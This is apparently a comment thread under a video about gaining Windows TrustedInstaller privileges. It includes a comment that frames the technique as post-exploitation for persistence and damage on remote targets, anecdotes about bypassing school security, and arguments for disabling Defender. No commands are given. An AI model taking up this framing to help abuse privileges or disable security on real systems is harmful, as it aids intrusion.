Hacking Windows TrustedInstaller (GOD MODE)

James Forshaw's blog: www.tiraniddo.dev/2017/08/the-art-of-becoming-trus… I love seeing the sentiment for "just run Linux", or "just boot into Safe Mode", or "just attach a recovery USB", etc., but I think in the case of leveraging this for a penetration test, red team engagement, or offensive security work, if it is a remote Windows target (where you can't change the OS or have physical access) you have to live off the land and the constraints of the environment. This process should be valuable when you've got initial access, escalated privileges, and can do further post-exploitation to do damage or set up some sneaky persistence -- you can't as easily make changes, but you can sure as hell run PowerShell code. Just an option and one of many ways to skin a cat :)

I've bricked my vm windows install 3 times this year since I found this channel, excellent video!!

User: "can I uninstall Edge?" Windows: "absolutely not." User: "can I uninstall the Kernal" Linux: "Let's find out!"

3:06 what stackoverflow is like now - Q: "How do I do X" A: "Why would you do that? dont do that." (if your lucky they give an alternative) What it should be: "You can do that by doing this, but you this is the better way"

Redditors are so aggressive about being wrong that it's quite comical.

Now imagine deleting every single internet application apart from teamviewer and anydesk and calling tech scam call centers.

I really dislike how people on Reddit feel entitled to even command others not to do something when it has been made clear that I want to do it, because I know what I'm doing. The same thing often happens with Defender as well. There are perfectly valid reasons to want to disable Defender on a machine and when looking for potential solutions, people quickly shout at you not do it. It honestly feels like they think it's cool to just defend security at all costs instead of evaluating that disabling security measures are useful in certain scenarios.

Reminds me of how on XP you could actually become System, complete with XP startmenu identifying as system.

Hahaha, this thumbnail aged like fine wine :D

Guess what, recently Windows started harassing me with the win11 update by installing a program called RUXIM, and every time i deleted it windows just installed it back. So i changed the privilige from system to me, and i denied write access for system :d

There is a plugin for Process Hacker which allows you to start any process with TrustedInstaller permissions and even run GUI apps like cmd.

Whoa, this was a great video with some even better enthusiasm! Thanks for sharing this, I learned several new things and I have some new ideas for setting up security policies around the trusted installer or attempts to a abuse it. 🙏🙏🙏🔥🔥🔥

I really enjoyed the way you broke this problem down. Add this to the list of follies that is Windows OS. Once Linux is fully able to boot whatever games I want I will fully drop windows. It’s so annoying to have to jump through so many hoops to delete programs from your own PC.

I barely use that joke of a website but every time I've had to because there was no other option, 99% of my experience from reddit has been almost exactly what you showed in the video. Armchair redditors answering everything besides the question you're asking and in the most condescending way possible. I unironically have more competent conversations with people on /b/ than anywhere I've been forced to go on reddit. Great video btw

In other words, removing bloatware with the equivalent of Linux sudo

It might also be worthwhile noting that any process run in "Session 0" will always result be in a non-gui context. AFAIK "most" services are run as Session 0 meaning they will never have a GUI to interact with.

I was on the path to be a programmer, but I got kicked out of computer science in high school for getting caught having full access to the hd, bypassing the name/password.. I didn't keep up with it. I became a musician for the last 25 years and became really good at that, realizing now, If i would have continued my computer programming path, I'd be smart enough to follow all of this video, but now it's over my head.. lol.. The way he talks as if it's obvious to do this and that.. Shake my head and smile, the world is in the hands of people far smarter than I ... :)

Every single time i watch Jhon Hammond i look at myself and say : I'm a noob in IT even though i was that strange kid that was obsessed over computers out of curiosity. I was the only kid who hacked my school and sold wifi passwords for admin privilege at my first year of high-school. I fixed my first laptop (from a friend) replacement with hardware when i was 11 but yet Jhon Hammond reminds me the learning curve in IT is ENDLESS! GOD I LOVE THE ENDLESS LEARNING

Always fun John, thanks!

The reason you're getting the error when setting binpath for the service is because there are certain requirements for executables designed to operate as Windows services, one of which is to respond to queries from the service control manager. Obviously tools that aren't designed this way (like cmd.exe) don't respond and the service control manager thinks "this service is not responding and didn't start correctly." The reason you still see the executable being run is due to a small timeout that the service control manager uses to wait for the service to initialize. The reason you can't see graphical applications like notepad is because services don't run under the local user session and don't have access to the desktop.